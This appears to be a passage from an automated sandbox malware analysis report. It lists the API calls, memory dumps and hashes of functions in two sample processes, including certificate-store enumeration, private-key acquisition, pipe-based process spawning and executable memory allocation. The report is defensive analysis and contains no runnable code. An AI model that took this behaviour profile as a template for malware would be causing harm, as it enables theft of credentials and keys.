Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 007104F5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00710546

Memory Dump Source

Source File: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70d000_fihcrfb.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d7434f5def80e29834f98352125face15b679fc8b8285dfaf1c592d287352c20
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 3B112B79A00208EFDB01DF98C989E98BFF5AF08350F058094F9489B362D375EA90DF90

Function 00418650 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00513D6C,00418CE2), ref: 00418658

Memory Dump Source

Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10

Non-executed Functions

Function 00418860 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00418874
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418886
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 004188DE
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0

Strings

-, xrefs: 004188FD

Memory Dump Source

Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd

Similarity

API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
String ID: -
API String ID: 2332831159-2547889144
Opcode ID: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
Instruction ID: 0644f3d8bb0354bad6e2d065abd9d00753a10c55890622e6c15ca0d418187488
Opcode Fuzzy Hash: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
Instruction Fuzzy Hash: 3D11FE31A84304B7E7217BA4AD45BEE3F74AB09B11F51413DFB046A1C1CEB41D81975E

Function 00418896 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 004188DE
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0

Strings

-, xrefs: 004188FD

Memory Dump Source

Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd

Similarity

API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
String ID: -
API String ID: 1414951042-2547889144
Opcode ID: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
Instruction ID: 7ad43abfb1ccff6a3ed9ab509b84ed7d9337a427fc65eba8a3385d97bacaee92
Opcode Fuzzy Hash: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
Instruction Fuzzy Hash: 96F0C231A84305ABDB219FA4EC567D97B70FB08725F614268F6086E1C0CAB41A42DB8A

Function 00418920 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(0041A398,?,00000000), ref: 00418957
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418972
HeapDestroy.KERNEL32(00000000), ref: 00418991
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004189A0

Memory Dump Source

Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 6106f044a8ab3b7a482ce23ec0a1203b538232170fb1ceb5eae964420bede924
Instruction ID: f860d7c9f62419cabb77a296b47f4597be1339bc88c022d8ab911ec82e630865
Opcode Fuzzy Hash: 6106f044a8ab3b7a482ce23ec0a1203b538232170fb1ceb5eae964420bede924
Instruction Fuzzy Hash: A20188B4940208DFD720EB64ED55BE97778D718345F40407BEA05A7290DE345E85CF9E

Analysis Process: 354F.exePID: 8108, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	19.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	875
Total number of Limit Nodes:	32

Executed Functions

Function 00007FF780B67138 Relevance: 4.5, APIs: 3, Instructions: 38
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780B67503), ref: 00007FF780B6714F
CoInitializeSecurity.COMBASE ref: 00007FF780B671B6
CoCreateInstance.COMBASE ref: 00007FF780B671D3

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Initialize$CreateInstanceSecurity
String ID:
API String ID: 89549506-0
Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
Instruction ID: 5a115f3e541478b1131f46627067dbb908af874077dbe5b669ce49c098620bbc
Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
Instruction Fuzzy Hash: 80118C73A14640DBF3109F65E8593AE7B74F34470DF608618DA491AA98CF3CD245CB94

Function 00007FF780B62654 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF780B61951,?,?,00000000,00007FF780B619BA), ref: 00007FF780B62669
RtlReAllocateHeap.NTDLL(?,?,?,00007FF780B61951,?,?,00000000,00007FF780B619BA), ref: 00007FF780B6267A

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 1be63deb12e22185627b2ef812326b1288c4791bb80671bf174c6fa45bf883bb
Instruction ID: 68d1bab17c94239179f8226f64930a7cc70d35ab8dcdd6502a59291f47a7cde3
Opcode Fuzzy Hash: 1be63deb12e22185627b2ef812326b1288c4791bb80671bf174c6fa45bf883bb
Instruction Fuzzy Hash: 24E08619A0998286F918ABD7BD540759621BF48FC0FA88430DE1F07BD5CE2CE4418720

Function 00007FF780B62D5C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253
encryptiontimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF780B62D90
CertGetNameStringW.CRYPT32 ref: 00007FF780B62DD3
CertNameToStrW.CRYPT32 ref: 00007FF780B62EB8
CertNameToStrW.CRYPT32 ref: 00007FF780B62F0A
FileTimeToSystemTime.KERNEL32 ref: 00007FF780B62F4B
FileTimeToSystemTime.KERNEL32 ref: 00007FF780B62FC1

Part of subcall function 00007FF780B61A70: wvsprintfW.USER32 ref: 00007FF780B61AA9

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF780B63178

Part of subcall function 00007FF780B63220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B6325E
Part of subcall function 00007FF780B63220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF780B6328D
Part of subcall function 00007FF780B63220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B632BB
Part of subcall function 00007FF780B63220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63336
Part of subcall function 00007FF780B63220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF780B62C48), ref: 00007FF780B63380
Part of subcall function 00007FF780B63220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF780B633AC

Strings

1.2.840.113549, xrefs: 00007FF780B6305F, 00007FF780B6306F

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
String ID: 1.2.840.113549
API String ID: 2787208766-3888290641
Opcode ID: 545a1611eb2a54eb757bcc652c01f555a0221115e57e41545144f89a8227abb2
Instruction ID: 22b50fb331683274e0f6a731b6b8aec93187b9096e3d65e4996c6a59d947b404
Opcode Fuzzy Hash: 545a1611eb2a54eb757bcc652c01f555a0221115e57e41545144f89a8227abb2
Instruction Fuzzy Hash: A8B1B466A0864289EB50EF56D8111BEEB65FB84BC4F940431EE9E07BD9DF3CE105CB60

Function 00007FF780B6900C Relevance: 13.6, APIs: 9, Instructions: 137
pipeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNELBASE ref: 00007FF780B6905F
GetLastError.KERNEL32 ref: 00007FF780B6907D
CreatePipe.KERNELBASE ref: 00007FF780B690B7
GetLastError.KERNEL32 ref: 00007FF780B690D5
CreatePipe.KERNELBASE ref: 00007FF780B690FC
GetLastError.KERNEL32 ref: 00007FF780B6911A
CreateProcessW.KERNELBASE ref: 00007FF780B691B7
GetLastError.KERNEL32 ref: 00007FF780B691DF
CloseHandle.KERNEL32 ref: 00007FF780B691F9

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: CreateErrorLast$Pipe$CloseHandleProcess
String ID:
API String ID: 2620922840-0
Opcode ID: dde7782f1bc3f6fc15d7fd9262a944f11080e4dfcac6f8c9fc0e3dfe22951d74
Instruction ID: 934ab2da12eccaa53f756a2a0b40cbd51b8b926f041f3c759c99b23344df5d36
Opcode Fuzzy Hash: dde7782f1bc3f6fc15d7fd9262a944f11080e4dfcac6f8c9fc0e3dfe22951d74
Instruction Fuzzy Hash: A2518236B09A018AEB10EFA5D8543EC67A5BB58788F900535DE1E97BD5DF3CE109C360

Function 00007FF780B69224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158
synchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B6924D

Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5

Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B693AB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B693C0
TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B693EF

Part of subcall function 00007FF780B6968C: PeekNamedPipe.KERNELBASE ref: 00007FF780B696B8

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF780B69421
GetExitCodeProcess.KERNELBASE ref: 00007FF780B69460

Strings

& echo , xrefs: 00007FF780B692BF

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
String ID: & echo
API String ID: 2711250446-3491486023
Opcode ID: 0e5a6491b23a52f077622e03fa1d9963b355e200ccccf575446c2c7b3acaf6c1
Instruction ID: b4e2143e04c483dee3af429cc20f052373837aab7d23b751e7a157ef4823e29a
Opcode Fuzzy Hash: 0e5a6491b23a52f077622e03fa1d9963b355e200ccccf575446c2c7b3acaf6c1
Instruction Fuzzy Hash: 86516229B0A64285EE60EB56E9552BAEB95FF84B80FE44031CA5F47BC5DE3CF445C320

Function 00007FF780B62BAC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertOpenStore.CRYPT32 ref: 00007FF780B62C16
CertCloseStore.CRYPT32 ref: 00007FF780B62CC2

Part of subcall function 00007FF780B62D5C: CertEnumCertificatesInStore.CRYPT32 ref: 00007FF780B62D90
Part of subcall function 00007FF780B62D5C: CertGetNameStringW.CRYPT32 ref: 00007FF780B62DD3
Part of subcall function 00007FF780B62D5C: CertNameToStrW.CRYPT32 ref: 00007FF780B62EB8
Part of subcall function 00007FF780B62D5C: CertNameToStrW.CRYPT32 ref: 00007FF780B62F0A

Strings

)qnq, xrefs: 00007FF780B62C88
dqyq, xrefs: 00007FF780B62C6B
yqyq, xrefs: 00007FF780B62C5E

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: Cert$NameStore$CertificatesCloseEnumOpenString
String ID: )qnq$dqyq$yqyq
API String ID: 3617724111-466822987
Opcode ID: 3fbbea3cf0043cfd1396815568612ef09bc48b21a67d779a1035e65ff906c74b
Instruction ID: a691de8d8a50a8e5ffc9b85b56ee34dd5e1b27f7f01fa339fce4998fd39c9e6d
Opcode Fuzzy Hash: 3fbbea3cf0043cfd1396815568612ef09bc48b21a67d779a1035e65ff906c74b
Instruction Fuzzy Hash: 2921C776A1868286EB50EF5AEC152AAE721FBC0780F645431EA9F477C9DF3CE405CB50

Function 00007FF780B62B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumSystemStore.CRYPT32 ref: 00007FF780B62B7F

Strings

"_":"", xrefs: 00007FF780B62B5C
":{, xrefs: 00007FF780B62B4D

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: CertEnumStoreSystem
String ID: ":{$"_":""
API String ID: 4132996702-2026347918
Opcode ID: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
Instruction ID: 4a102a4f468b27ae2801ad7022903a9360b523a87208b0299147e21dd0bd0431
Opcode Fuzzy Hash: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
Instruction Fuzzy Hash: D9012155A0864146FB04AB5AAC510B99B55BF94BC0FAC5831DD6F477DACF2CF142C720

Function 00007FF780B631C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumSystemStoreLocation.CRYPT32 ref: 00007FF780B63200

Strings

"_": "", xrefs: 00007FF780B631E2

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: CertEnumLocationStoreSystem
String ID: "_": ""
API String ID: 863500693-1453221996
Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
Instruction ID: 22a57ce37c0992170f9ea643f8f2eb9bfd92a70cabc093afedac58cdb4071962
Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
Instruction Fuzzy Hash: 40E03059A1850245EB44BFA6AC250F49714AF487C0FDC2831D92F463D6DE2CF486C230

Function 00007FF780B6968C Relevance: 3.0, APIs: 2, Instructions: 42
filepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekNamedPipe.KERNELBASE ref: 00007FF780B696B8
ReadFile.KERNELBASE ref: 00007FF780B696F7

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: FileNamedPeekPipeRead
String ID:
API String ID: 327342812-0
Opcode ID: 096132fb93717013b3e16f88d7bf0609256235cc15a0420f845206ceb18e82a6
Instruction ID: 948cabff03476e0cfbfe8988c27984f0e7b76884d5f275f17403c0e25bf775f3
Opcode Fuzzy Hash: 096132fb93717013b3e16f88d7bf0609256235cc15a0420f845206ceb18e82a6
Instruction Fuzzy Hash: 8B01223672824287FB50AF16E80473AEBA0FB85BD4FA44130DA1A4B794DF7CE840CB10

Function 00007FF780B695A0 Relevance: 3.0, APIs: 2, Instructions: 39
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,?,00007147,00007FF780B69B7A), ref: 00007FF780B695B6
GetExitCodeProcess.KERNELBASE ref: 00007FF780B695F6

Part of subcall function 00007FF780B6968C: PeekNamedPipe.KERNELBASE ref: 00007FF780B696B8

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
String ID:
API String ID: 2021502500-0
Opcode ID: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
Instruction ID: 168717a5ea3e816e1f3ce2569a383e46872ac67d7206424055a166cf2f57dc92
Opcode Fuzzy Hash: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
Instruction Fuzzy Hash: B4019226A0A74282FF90AF25D8403786769FF40B88FA45531CA1F476C9DF2CEC85C320

Function 00007FF780B61A70 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wvsprintfW.USER32 ref: 00007FF780B61AA9

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: wvsprintf
String ID:
API String ID: 2795597889-0
Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
Instruction ID: 985c900ae4de829208414ca01d23ec263fc235d3c79e2a788c4abb0ccd780908
Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
Instruction Fuzzy Hash: 1DE06DB2A00B45C7D704DF19E94008CBB75FB99FC4BA48021CB4817365CF38D996C760

Function 00007FF780B679C4 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF780B674DE), ref: 00007FF780B679CD

Memory Dump Source

Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true

Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
